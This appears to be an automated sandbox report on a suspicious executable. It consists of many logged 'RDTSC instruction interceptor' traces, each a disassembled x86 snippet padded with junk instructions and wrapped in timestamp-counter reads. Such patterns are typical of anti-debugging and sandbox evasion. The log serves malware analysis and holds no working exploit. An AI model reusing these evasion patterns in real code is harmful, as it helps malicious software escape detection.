Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0632 second address: 50E0646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx ecx, bx 0x00000011 mov ecx, edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0646 second address: 50E064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0663 second address: 50E0687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A866h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0687 second address: 50E06A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E06A4 second address: 50E06B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D002D second address: 50D0055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F856102FBECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0055 second address: 50D0069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3D755AD4h 0x00000008 mov bl, 50h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0069 second address: 50D00D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F856102FBF4h 0x00000009 xor cl, FFFFFFB8h 0x0000000c jmp 00007F856102FBEBh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F856102FBF8h 0x00000018 or eax, 447FAC18h 0x0000001e jmp 00007F856102FBEBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F856102FBF5h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D00D7 second address: 50D00DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D00DD second address: 50D00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D00E1 second address: 50D00E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D00E5 second address: 50D0146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a pushad 0x0000000b call 00007F856102FBF5h 0x00000010 call 00007F856102FBF0h 0x00000015 pop eax 0x00000016 pop ebx 0x00000017 pushfd 0x00000018 jmp 00007F856102FBF0h 0x0000001d and eax, 43AFFB38h 0x00000023 jmp 00007F856102FBEBh 0x00000028 popfd 0x00000029 popad 0x0000002a push 6A13E6FFh 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0146 second address: 50D014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D014C second address: 50D01F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0BB2B749h 0x00000010 jmp 00007F856102FBF6h 0x00000015 call 00007F856102FBE9h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F856102FBEEh 0x00000021 or cx, F728h 0x00000026 jmp 00007F856102FBEBh 0x0000002b popfd 0x0000002c mov eax, 0386F41Fh 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007F856102FBF5h 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d push ebx 0x0000003e mov eax, 0B64C159h 0x00000043 pop ecx 0x00000044 jmp 00007F856102FBEFh 0x00000049 popad 0x0000004a mov eax, dword ptr [eax] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F856102FBEBh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D01F3 second address: 50D0210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0210 second address: 50D0220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856102FBECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0220 second address: 50D0224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0224 second address: 50D02E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F856102FBECh 0x00000013 adc si, E0A8h 0x00000018 jmp 00007F856102FBEBh 0x0000001d popfd 0x0000001e mov edx, ecx 0x00000020 popad 0x00000021 pop eax 0x00000022 jmp 00007F856102FBF2h 0x00000027 mov eax, dword ptr fs:[00000000h] 0x0000002d pushad 0x0000002e mov eax, 7C1B1FDDh 0x00000033 mov ah, DCh 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov dx, si 0x0000003b mov dh, ah 0x0000003d popad 0x0000003e mov dword ptr [esp], eax 0x00000041 jmp 00007F856102FBEFh 0x00000046 sub esp, 18h 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007F856102FBF4h 0x00000050 xor eax, 4BD0C7C8h 0x00000056 jmp 00007F856102FBEBh 0x0000005b popfd 0x0000005c mov ebx, eax 0x0000005e popad 0x0000005f xchg eax, ebx 0x00000060 jmp 00007F856102FBF2h 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F856102FBEEh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D02E0 second address: 50D0318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F856106A861h 0x00000009 add ax, FA46h 0x0000000e jmp 00007F856106A861h 0x00000013 popfd 0x00000014 mov dh, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0318 second address: 50D031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D031C second address: 50D0330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A860h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0330 second address: 50D0357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F856102FBF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0357 second address: 50D035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D035D second address: 50D0361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0361 second address: 50D0399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A863h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 push eax 0x00000011 mov al, bh 0x00000013 pop esi 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F856106A862h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0399 second address: 50D039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D039F second address: 50D03DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov al, AFh 0x0000000c mov eax, ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], edi 0x00000012 jmp 00007F856106A863h 0x00000017 mov eax, dword ptr [75C74538h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F856106A860h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D03DD second address: 50D03E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D03E1 second address: 50D03E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D03E7 second address: 50D03ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D03ED second address: 50D0450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A868h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [ebp-08h], eax 0x0000000e jmp 00007F856106A860h 0x00000013 xor eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007F856106A868h 0x00000020 sub si, B1E8h 0x00000025 jmp 00007F856106A85Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50D0450 second address: 50D0476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F856102FBF9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C048A second address: 50C054C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007F856106A867h 0x00000015 or al, 0000004Eh 0x00000018 jmp 00007F856106A869h 0x0000001d popfd 0x0000001e pop esi 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 push ebx 0x00000024 pushfd 0x00000025 jmp 00007F856106A868h 0x0000002a or al, FFFFFFF8h 0x0000002d jmp 00007F856106A85Bh 0x00000032 popfd 0x00000033 pop ecx 0x00000034 mov bx, 853Ch 0x00000038 popad 0x00000039 sub esp, 2Ch 0x0000003c jmp 00007F856106A85Bh 0x00000041 xchg eax, ebx 0x00000042 jmp 00007F856106A866h 0x00000047 push eax 0x00000048 jmp 00007F856106A85Bh 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f jmp 00007F856106A85Bh 0x00000054 popad 0x00000055 xchg eax, edi 0x00000056 pushad 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0723 second address: 50C0729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0729 second address: 50C072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C072F second address: 50C0755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0755 second address: 50C0759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0759 second address: 50C0776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0776 second address: 50C0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F85D1BC8557h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ch, dh 0x00000014 mov cl, 73h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0799 second address: 50C0815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F856102FC9Ch 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F856102FBEEh 0x00000016 xor eax, 3D39A718h 0x0000001c jmp 00007F856102FBEBh 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F856102FBF8h 0x00000028 jmp 00007F856102FBF5h 0x0000002d popfd 0x0000002e popad 0x0000002f cmp dword ptr [ebp-14h], edi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F856102FBEDh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0815 second address: 50C0825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0825 second address: 50C0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0829 second address: 50C0843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F85D1BC84C0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F856106A85Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0843 second address: 50C0870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 pushfd 0x00000006 jmp 00007F856102FBEAh 0x0000000b sub ax, DD68h 0x00000010 jmp 00007F856102FBEBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebx, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0870 second address: 50C088B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C088B second address: 50C090F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c jmp 00007F856102FBEEh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov cx, 4CEDh 0x00000017 mov eax, 3B59CAE9h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F856102FBEBh 0x00000025 pop eax 0x00000026 call 00007F856102FBF9h 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov dx, E994h 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 jmp 00007F856102FBF3h 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C090F second address: 50C092A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C09E6 second address: 50C0053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov eax, 6533711Bh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 je 00007F85D1B8D841h 0x0000001a xor eax, eax 0x0000001c jmp 00007F856100931Ah 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 leave 0x00000025 retn 0004h 0x00000028 nop 0x00000029 cmp eax, 00000000h 0x0000002c setne cl 0x0000002f xor ebx, ebx 0x00000031 test cl, 00000001h 0x00000034 jne 00007F856102FBE7h 0x00000036 jmp 00007F856102FD5Bh 0x0000003b call 00007F8565F08E85h 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F856102FBF5h 0x00000049 or cx, C936h 0x0000004e jmp 00007F856102FBF1h 0x00000053 popfd 0x00000054 push eax 0x00000055 push edx 0x00000056 pushfd 0x00000057 jmp 00007F856102FBEEh 0x0000005c add eax, 308C7058h 0x00000062 jmp 00007F856102FBEBh 0x00000067 popfd 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0053 second address: 50C008D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F856106A868h 0x00000008 jmp 00007F856106A865h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C008D second address: 50C0094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0094 second address: 50C00BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov cl, 34h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F856106A866h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C00BC second address: 50C00C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C00C2 second address: 50C011A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A864h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F856106A860h 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F856106A85Dh 0x0000001a sub ecx, 2B078176h 0x00000020 jmp 00007F856106A861h 0x00000025 popfd 0x00000026 mov di, si 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C011A second address: 50C0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0120 second address: 50C0124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C018A second address: 50C01C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushfd 0x00000007 jmp 00007F856102FBEAh 0x0000000c sub ah, FFFFFFB8h 0x0000000f jmp 00007F856102FBEBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F856102FBF5h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0DC7 second address: 50C0DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0E93 second address: 50C0E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0E99 second address: 50C0EAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 31318802h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0EAE second address: 50C0EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0EB4 second address: 50C0EB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0EB9 second address: 50C0EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBF0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007F85D1B84888h 0x00000011 push 75C12B70h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov eax, dword ptr [esp+10h] 0x00000021 mov dword ptr [esp+10h], ebp 0x00000025 lea ebp, dword ptr [esp+10h] 0x00000029 sub esp, eax 0x0000002b push ebx 0x0000002c push esi 0x0000002d push edi 0x0000002e mov eax, dword ptr [75C74538h] 0x00000033 xor dword ptr [ebp-04h], eax 0x00000036 xor eax, ebp 0x00000038 push eax 0x00000039 mov dword ptr [ebp-18h], esp 0x0000003c push dword ptr [ebp-08h] 0x0000003f mov eax, dword ptr [ebp-04h] 0x00000042 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000049 mov dword ptr [ebp-08h], eax 0x0000004c lea eax, dword ptr [ebp-10h] 0x0000004f mov dword ptr fs:[00000000h], eax 0x00000055 ret 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov cx, bx 0x0000005c mov eax, edx 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50C0EDE second address: 50C0EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A862h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07AD second address: 50E07B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07B1 second address: 50E07B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07B7 second address: 50E07CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 6CC3A783h 0x00000008 mov eax, 568F38DFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07CE second address: 50E07D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07D2 second address: 50E07D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07D6 second address: 50E07DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07DC second address: 50E07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07E2 second address: 50E07E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
